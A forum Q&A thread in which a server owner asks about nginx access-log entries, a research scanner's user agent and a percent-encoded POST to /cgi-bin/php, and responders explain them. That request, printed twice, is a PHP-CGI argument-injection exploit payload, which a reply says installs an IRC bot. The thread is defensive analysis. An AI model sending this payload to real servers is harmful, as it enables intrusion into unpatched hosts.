Getting "Cloud mapping experiment" and unexpected POST requests on the server in the nginx log


I am getting unexpected requests in the nginx access log on my server (aws-ec2). Examples below -

54.80.128.131 - - [05/Jul/2015:03:15:22 +0000] "HEAD / HTTP/1.1" 404 0 "-" "Cloud mapping experiment. Contact research@pdrlabs.net"

204.15.135.116 - - [05/Jul/2015:03:29:23 +0000] "POST /cgi-bin/php?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%64+%63%67%69%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%3D%30+%2D%64+%63%67%69%2E%72%65%64%69%72%65%63%74%5F%73%74%61%74%75%73%5F%65%6E%76%3D%22%79%65%73%22+%2D%64+%63%67%69%2E%66%69%78%5F%70%61%74%68%69%6E%66%6F%3D%31+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%6E HTTP/1.1" 404 5 "-" "Mozilla/5.0 (Windows NT 6.3; rv:36.0) Gecko/20100101 Firefox/36.0"

What should I do? Should I be worried?

Probably not. You are seeing someone visit your server and request content that does not exist (hence the 404). The "CloudMapping Experiment" part is just the user agent that came in with the request.

I can see a similar question about this user agent here, but nobody seems to know exactly what it does: https://serverfault.com/questions/611335/cloud-mapping-experiment-contact-researchpdrlabs-net-in-the-access-logs

I have seen this on 2 different networks, with unrelated services.

This is the latest one I am now seeing on a reverse proxy:

"GET /clientaccesspolicy.xml HTTP/1.1" 301 194 "-" "Cloud mapping experiment. Contact research@pdrlabs.net"

I think it may be some kind of vulnerability scanner trying to find vulnerable hosts. In this case it is looking for a file named /clientaccesspolicy.xml. There seem to be ways to exploit such files if the server sits behind a firewall, since they may allow access to protected areas: https://www.acunetix.com/vulnerabilities/web/insecure-clientaccesspolicy-xml-file

Now to answer your question, the request:

    POST /cgi-bin/php?  %2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%64+%63%67%69%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%3D%30+%2D%64+%63%67%69%2E%72%65%64%69%72%65%63%74%5F%73%74%61%74%75%73%5F%65%6E%76%3D%30+%2D%6E HTTP/1.1
    User-Agent: Mozilla/5.0 (iPad; CPU OS 6_0 like Mac OS X) AppleWebKit/536.26(KHTML, like Gecko) Version/6.0 Mobile/10A5355d Safari/8536.25
    Content-Type: application/x-www-form-urlencoded

This request is trying to install an IRC bot written in Perl by exploiting a very old vulnerability in PHP. [1]

This does not necessarily mean your server has been hacked. It just means someone made an attempt. It targets Unix systems running a version of PHP that is vulnerable to a 2-year-old bug. If you have updated PHP at least once in the past 2 years, you are most likely fine :)

Has anyone tried contacting them via the email they give in the user agent? :)

[1] More information on this page: https://isc.sans.edu/forums/diary/Web+Server+Attack+Investigation+Installing+a+Bot+and+Reverse+Shell+via+a+PHP+Vulnerability/18543/